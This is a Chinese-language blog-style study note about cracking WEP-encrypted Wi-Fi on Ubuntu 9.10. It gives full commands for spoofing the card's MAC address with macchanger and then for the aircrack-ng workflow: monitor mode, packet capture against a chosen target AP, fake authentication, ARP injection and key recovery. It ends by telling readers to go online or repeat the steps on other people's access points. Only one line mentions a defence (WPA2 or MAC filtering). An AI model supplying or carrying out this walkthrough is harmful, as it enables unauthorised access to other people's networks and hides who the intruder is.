Ubuntu 9.10学习笔记-破解无线WEP

如果不想被盗网就使用WPA2或者限制mac地址吧。

要是想要伪装mac 地址，可以使用伪造自己的mac地址(这一步你也可以不要)

1.首先我们查看自己的mac地址

在终端中输入ifconfig -a        察看当前网卡,这里是看你机器上的所有网卡，你要自己找到你的无线网卡

在这一步我看到的网卡名称为

wlan0

然后先停止载入USB网卡驱动

敲入命令

ifconfig -a wlan0 down

2. 然后输入macchanger –m 00:11:22:33:44:55 wlan0

将自己的USB网卡mac地址修改

-m后跟要伪造的MAC，之后再跟要修改的网卡名称,上面这里我们把USB网卡MAC修改成00:11:22:33:44:55

重新载入USB网卡驱动

敲入命令

ifconfig -a wlan0 up

下面是原内容，自己看看照着来好了。

———————————————————————

Ubuntu 9.10破解wep无线加密

一、安装ubuntu和aircrack-ng

先安装 Ubuntu9.04，更新系统到最新

终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng

没联网的话 到别的电脑上网下载aircrack-ng Ubuntu DEB安装包 安装

下载地址：http://packages.ubuntu.com/zh-cn/jaunty/i386/aircrack-ng/download

二、破解过程

1、启动无线网卡的监控模式，在终端中输入：sudo airmon-ng start wlan0

（wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看）

2、查看无线AP在终端中输入：

sudo airodump-ng mon0

（特别说明：启动监控模式后无线网的端口现在是 mon0 ！！！）

看看有哪些采用wep加密的AP在线，然后按 ctrl+c 退出，保留终端

3、抓包

另开一个终端，输入：

sudo airodump-ng -c 6 --bssid  目标的mac地址 -w wep mon0

(-c 后面跟着的6是要破解的AP工作频道，--bissid后面跟着的AP's MAC是要欲破解AP的MAC地址，-w后面跟着wep的是抓下来的数据包DATA保存的文件名，具体情况根据步骤2里面的在线AP更改频道和MAC地 址，DATA保存的文件名可随便命名）

4、与AP建立虚拟连接

再另开一个终端，输入：

sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0

（-h后面跟着的My MAC是自己的无线网卡的MAC地址，命令：

iwlist wlan0 scanning

可查看自己的MAC地址)

5、进行注入

成功建立虚拟连接后输入：

sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 目标的MAC地址 -h 我的MAC地址 mon0

现在回头看下步骤3的终端是不是DATA在开始飞涨！

6、解密

收集有5000个以上的DATA之后，另开一个终端，输入：

sudo aircrack-ng wep*.cap

进行解密

（如果没算出来的话，继续等，aircrack-ng 会在DATA每增加多5000个之后就自动再运行，直到算出密码为至）

7、收工

破解出密码后在终端中输入 sudo airomon-ng stop mon0 关闭监控模式，不然无线网卡会一直向刚刚的AP进行注入的，用ctrl+c退出或者直接关闭终端都是不行的。现在可以冲浪去了，或者重复步聚1-7破解其 它的AP 呵呵兄弟们冲浪时可别太猛了，不然把主人给冲翻了可就不好。